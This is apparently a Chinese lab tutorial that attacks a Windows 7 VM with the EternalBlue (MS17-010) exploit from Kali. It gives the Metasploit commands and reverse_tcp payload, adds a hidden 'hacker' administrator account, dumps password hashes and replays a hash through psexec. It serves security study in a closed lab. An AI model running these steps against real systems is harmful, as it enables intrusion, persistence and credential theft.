環(huán)境說明
機器 |
ip地址 |
Kali主機 |
192.168.231.129 |
win7靶機 |
192.168.231.143 |
一、獲取目標主機的管理員權限
1.使用kali虛擬機作為攻擊機,利用nmap掃描獲取目標的IP地址及漏洞,將兩個機器包括一個攻擊機Kali、win7的網絡連接模式都是NAT,即在一個網段里面,然后進行掃描網段,查看存活主機,下面是兩臺機器的ip地址查看,可以看到兩臺機器在同一個網段內,


即網段都在192.168.231中
2.然后可以使用命令:Nmap -v –sP 192.168.231.1/24進行網段掃描,

可以看到140和143的主機是存活的(因為這里我還開了一臺靶機WindowsXP,該實驗同樣可以在WindowsXP中實現(xiàn),實驗步驟一樣),還有一點發(fā)現(xiàn)就是在網段掃描中不會出現(xiàn)129的出現(xiàn),

因為129是Kali攻擊機的ip地址,所以不會顯示;
3.然后掃描目標主機的漏洞,使用命令:nmap -v --script=vuln 192.168.231.143(這里包括以后都以win7為例,winXP是同樣的操作),

可以看到這里有一個ms17-010的漏洞,即我們熟知永恒之藍漏洞,我們就可以利用這個漏洞來獲得靶機的shell,
4.使用命令:msfconsole,進入metasploit工具,

然后使用search命令,搜索永恒之藍有什么可以利用的部分,search ms17-010,

可以看到有0-4五個可以利用的漏洞,這里我們使用0棧溢出漏洞,使用use 0即可,

5.然后它提示我們沒有設置載荷,可以使用set命令來設置載荷,如:
set PAYLOAD windows/x64/meterpreter/reverse_tcp

6.然后查看攻擊模塊所需要配置的參數(shù):show options,

7.在這里我們需要配置lhost,rhost,target,

為了確保參數(shù)都配置好了,我們還是查看一下,

可以看到該配置的參數(shù)都配置好了,然后就可以進行攻擊了,
8.使用run命令,進行滲透攻擊,

可以看到我們已經成功滲透進入了win7,并獲取了管理員權限,
9.然后進入win7目標機命令窗口,shell,

可以看到出現(xiàn)了亂碼,然后我們可以進行調整回正確的顯示,輸入:chcp 65001即可,

然后我們就可以進行后滲透操作。
二、創(chuàng)建管理員賬戶
1.首先我們在win7的 控制面板->用戶賬戶和家庭安全->用戶賬戶->管理賬戶中可以查看現(xiàn)在已有的賬戶,然后我們進入shell并在目標機創(chuàng)建新的管理員用戶,使用命令net user hacker hacker123 /add


2.但在這里我們可以看到,新建的用戶hacker并不是一個管理員用戶,所以還需要進行提權操作,使用命令,net localgroup Administrators hacker /add


然后我們可以看到hacker有之前的標準用戶變成了管理員用戶,
三、提取系統(tǒng)用戶和密碼hash值
提取系統(tǒng)用戶名和密碼Hash,使用命令,run post/windows/gather/hashdump

可以看到這里有剛剛創(chuàng)建的管理員用戶hacker的用戶名和hash密碼,
四、hash重放攻擊
1.所謂重放密碼hash攻擊,就是不再利用該漏洞,直接通過賬戶名和密碼hash值進行攻擊賬戶,從而達到獲取管理員權限的目的。所以我們得退出現(xiàn)有的環(huán)境,不用該漏洞,直接exit,然后再重新進去msf,使用msfconsole,

2.接著使用命令:use windows/smb/psexec;并進行payload的設置,set PAYLOAD windows/meterpreter/reverse_tcp;然后設置主機和靶機的ip,

3.在設置賬戶和密碼hash之前要先將win7下的UAC關閉,并將win7重啟,不然會失敗,

4.設置賬戶,set SMBUser sherry即可,接著就是使用密碼hash進行重放攻擊了,直接使用之前獲取的hash密碼,set SMBPass aad3b435b51404eeaad3b435b51404ee:5f8d3ac1c35a759a467f1d77ff0419a9

在滲透之前再查看一遍參數(shù)是否全部設置成功,文章來源:http://www.zghlxwxcb.cn/news/detail-718026.html

5.在全部準備工作完成好之后,直接exploit即可,也可以使用run運行,文章來源地址http://www.zghlxwxcb.cn/news/detail-718026.html

到了這里,關于通過Kali利用永恒之藍漏洞目標主機shell,并進行部分后滲透操作的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!